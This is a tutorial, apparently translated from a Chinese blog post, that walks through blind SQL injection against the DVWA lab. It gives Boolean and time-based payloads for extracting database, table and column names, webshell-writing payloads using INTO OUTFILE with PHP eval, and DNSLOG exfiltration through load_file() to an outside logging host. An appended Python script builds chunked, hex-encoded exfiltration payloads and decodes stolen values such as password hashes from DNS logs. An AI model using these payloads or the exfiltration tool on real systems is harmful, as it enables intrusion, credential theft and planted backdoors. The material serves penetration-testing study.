SQL Injection (Blind)

SQL Injection (Blind), i.e. blind SQL injection. The difference from ordinary injection is that with ordinary injection the result of the injected statement is shown directly on the page, while with blind injection the page does not display the result at all; the attacker cannot even see whether the injected statement ran, so blind injection is harder than ordinary injection. Most SQL injection vulnerabilities found on the web today are blind.

0x01 Classification

Boolean-based
The page answers only true or false: the response shows whether the injected condition held, and no error message or query output is ever returned.
Time-based
The page returns the same content no matter whether the injected condition is true or false; every input is handled as if it were normal. By adding a time-delay function to the injected statement, the attacker judges whether the condition held from the difference in response time.

0x02 Commonly used functions

substr(): substr(string, start, length); string is the string to cut, start is the starting position (1-based), length is the number of characters to return.
count(): aggregate function that counts the number of rows matching the condition, for example
SELECT COUNT(*) FROM mysql.user WHERE id = 1
ascii(): returns the decimal ASCII code of the (first) character.
length(): returns the length of the string.
left(): left(str, length), i.e. left(string to cut, number of leading characters to keep).

0x03 Steps of manual blind injection

1. Determine whether an injection point exists, and whether it is string-type or numeric-type
2. Guess the name of the current database
3. Guess the table names in the database
4. Guess the column names in the table
5. Guess the data

0x04 Boolean-based blind injection

1. Determining the injection point

1' or 1=1 #
1' or 1=2 #
Compare the responses to the two payloads to confirm the injection and that the parameter is string-type (the closing quote and the trailing comment are required). If the injection point is after ORDER BY, such a comparison cannot be used directly; build the condition with if() instead: when the condition is false the scalar subquery returns two rows and the query errors, when it is true it runs normally.
select 1 from te order by if(1,1,(select 1 union select 2)) limit 0,3;

2. Guessing the database name

Database name length: 1' and length(database())=4 #  exists
Database name: guess it by binary search, comparing ASCII codes to derive one character at a time
1' and ascii(substr(database(),1,1))>97 #   exists
1' and ascii(substr(database(),1,1))>100 #  does not exist
1' and ascii(substr(database(),1,1))<103 #  exists
1' and ascii(substr(database(),1,1))<100 #  does not exist
So the ASCII code of the first character of the database name is 100, the letter d.
Repeating the above steps for the remaining positions gives the full database name, dvwa.

3. Guessing the table names

1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 #  does not exist
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #  exists
So there are two tables. Next use length() to guess the length of each table name (the outer substr(...,1) in these payloads is redundant; length() of the subquery alone gives the same answer):
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #  does not exist
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 #  does not exist
...
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #  exists
So the first table name is 9 characters long. Then guess its characters by binary search:
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 #   exists
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 #  exists
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 #  exists
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 #  does not exist
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 #  does not exist
So the first character of the first table name is the lowercase letter g.
...
Repeating the above steps gives the two table names, guestbook and users.

4. Guessing the column names in the table
First guess the number of columns in the table:

1' and (select count(column_name) from information_schema.columns where table_name='users')=1 #  does not exist
...
1' and (select count(column_name) from information_schema.columns where table_name='users')=8 #  exists
So the users table has 8 columns. (A table called users may exist in more than one schema; adding and table_schema=database() to the where clause keeps another database's table from being counted.)
Then guess the length of each column name in turn:
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1 #  does not exist
...
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7 #  exists
So the first column of the users table is 7 characters long.
Binary search then recovers every column name.

5. Guessing the data

Likewise by binary search, with a subquery over the discovered table and columns in place of the information_schema subquery.

0x05 Time-based blind injection

1. Determine whether an injection point exists, and whether it is string-type or numeric-type

1' and sleep(5) #   a noticeable delay;
1 and sleep(5) #    no delay;
The delay appears only when the quote closes the string, so the parameter is string-type.

2. Guessing the current database name

First guess the length of the database name:
1' and if(length(database())=1,sleep(5),1) #  no delay
1' and if(length(database())=2,sleep(5),1) #  no delay
1' and if(length(database())=3,sleep(5),1) #  no delay
1' and if(length(database())=4,sleep(5),1) #  noticeable delay
The IF function, IF(expr1,expr2,expr3), returns expr2 if expr1 is true and expr3 if expr1 is false.
So the database name is 4 characters long.
Next guess the database name by binary search:
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1) #   noticeable delay
1' and if(ascii(substr(database(),1,1))<100,sleep(5),1) #  no delay
1' and if(ascii(substr(database(),1,1))>100,sleep(5),1) #  no delay
So the first character of the database name is the lowercase letter d.

Repeating the above steps gives the whole database name.

3. Guessing the table names in the database

First guess the number of tables in the database:
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1) #  no delay
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1) #  noticeable delay
So the database has two tables.
Next guess the table names one by one:
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) #  no delay
...
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #  noticeable delay
So the first table name is 9 characters long.
Binary search then recovers the table names.

4. Guessing the column names in the table

First guess the number of columns in the table:
1' and if((select count(column_name) from information_schema.columns where table_name='users')=1,sleep(5),1) #  no delay
...
1' and if((select count(column_name) from information_schema.columns where table_name='users')=8,sleep(5),1) #  noticeable delay
So the users table has 8 columns.
Next guess the column names one by one:
1' and if(length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1,sleep(5),1) #  no delay
...
1' and if(length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7,sleep(5),1) #  noticeable delay
So the first column of the users table is 7 characters long.
Binary search then recovers each column name.

5. Guessing the data

Likewise by binary search.

0x06 Exporting a webshell

Requires knowing the physical path of the web root, MySQL running with root (FILE) privileges, and secure_file_priv not restricting where the server may write files.
1' union select "<?php @eval($_GET['xxx']) ?>",2 into outfile 'C:\\phpStudy\\WWW\\123.php'#

0x07 DNS injection (the eyes of blind injection)

Whether Boolean-based or time-based, blind injection needs a large number of requests to pull values out of the database, and behind a modern WAF that is likely to get the source IP banned. Combining the injection with DNSLOG gets the data out quickly and cleanly. For a MySQL blind injection the built-in function load_file() can be used to trigger the lookup: load_file() not only reads local files, it will also try to open a UNC path such as \\www.test.com\abc, which makes the server resolve the host name. This works when MySQL runs on Windows (the OS resolves the UNC host) and secure_file_priv does not block load_file().

Function

load_file(): reads a file

Principle

Example

MySQL

1. Query the database name and the current user
test' and if((select load_file(concat('\\\\',(select database()),'.fz0bj5.ceye.io\\abc'))),1,1)#
test' and if((select load_file(concat('\\\\',(select user()),'.fz0bj5.ceye.io\\abc'))),1,1)#
Then check the ceye.io log: the database name has been received.
For table names and the rest, load_file() can only carry one value per request, so the queries use limit to pull the rows out one at a time.

2. Query table names
test' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='mkcms' limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
3. Query column names
test' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='mkcms_user' limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
4. Query column values
test' and if((select load_file(concat('\\\\',(select u_password from mkcms_user limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
5. Export a webshell (requires the physical path and MySQL running as root)
test' union select "<?php @eval($_POST['wade']); ?>" into outfile 'C:\\phpstudy\\www\\wade.php'#
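As an added example (not from the original post), the following Python shows both ends of the DNSLOG channel described in this section and goes one step beyond it: the payload builder wraps the value in hex() and sends it in 63-character slices, because a raw value such as a password hash or a user@host string may be longer than one DNS label allows, and bytes such as spaces or @ are not valid in a hostname; the receiver reassembles the slices from DNS-log lines by the chunk number carried in the name. The logging domain fz0bj5.ceye.io and the mkcms_user table are taken from the post; the log line format, the password value and the "victim" simulation (what MySQL's hex()/substr()/concat() would produce) are constructed for the demo.

```python
import re
from math import ceil

ATTACKER_DOMAIN = "fz0bj5.ceye.io"  # the post's DNSLOG domain; substitute your own
LABEL_MAX = 63                      # RFC 1035: a single DNS label holds at most 63 octets


def dns_payload(expr, chunk, domain=ATTACKER_DOMAIN):
    """Build the post's load_file() UNC payload for one 63-octet slice of hex(expr).
    hex() keeps characters that are illegal in a hostname from breaking the lookup, and
    the chunk number placed in the name lets the receiver reorder out-of-order queries."""
    piece = f"substr(hex({expr}),{chunk * LABEL_MAX + 1},{LABEL_MAX})"
    unc = rf"concat('\\\\',{piece},'.{chunk}.{domain}\\abc')"
    return f"test' and if((select load_file({unc})),1,1)#"


def chunks_needed(value):
    """How many payloads must be sent to carry the whole value (2 hex digits per byte)."""
    return ceil(len(value.encode()) * 2 / LABEL_MAX)


def simulate_victim(value, domain=ATTACKER_DOMAIN):
    """Stand-in for the MySQL/Windows side: the host names that the chunked payloads would
    make the server resolve, i.e. what ends up in the attacker's DNS log."""
    hexed = value.encode().hex().upper()  # MySQL HEX() output
    return [f"{hexed[c * LABEL_MAX:(c + 1) * LABEL_MAX]}.{c}.{domain}"
            for c in range(chunks_needed(value))]


def decode_dns_log(lines, domain=ATTACKER_DOMAIN):
    """Attacker side: pull the hex chunks out of DNS-log lines, order them by chunk number,
    and unhex. Returns None when no query for the domain is present; raises if a chunk
    is missing (the value cannot be trusted if a lookup was dropped or served from cache)."""
    pattern = re.compile(rf"\b([0-9A-Fa-f]{{1,{LABEL_MAX}}})\.(\d+)\.{re.escape(domain)}\b")
    chunks = {}
    for line in lines:
        m = pattern.search(line)
        if m:
            chunks[int(m.group(2))] = m.group(1)
    if not chunks:
        return None
    expected = set(range(max(chunks) + 1))
    if set(chunks) != expected:
        raise ValueError(f"missing chunks: {sorted(expected - set(chunks))}")
    return bytes.fromhex("".join(chunks[i] for i in range(len(chunks)))).decode()


if __name__ == "__main__":
    secret = "5f4dcc3b5aa765d61d8327deb882cf99"  # constructed u_password value
    expr = "(select u_password from mkcms_user limit 0,1)"
    for c in range(chunks_needed(secret)):
        print(dns_payload(expr, c))
    # Constructed DNS-log lines (timestamp, resolver IP, queried name), deliberately out of order.
    log = [f"2019-08-17 13:05:0{i} 203.0.113.7 {name}"
           for i, name in enumerate(reversed(simulate_victim(secret)))]
    print(decode_dns_log(log))
```

A 32-character hash becomes 64 hex digits, so it already needs two lookups; the attacker keeps sending chunk k+1 until the log shows a label shorter than 63 characters. Resolver caching can swallow a repeated query, which is why the chunk number (and, in practice, a per-request nonce) belongs in the name.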

Origin www.cnblogs.com/ihacker/p/11370169.html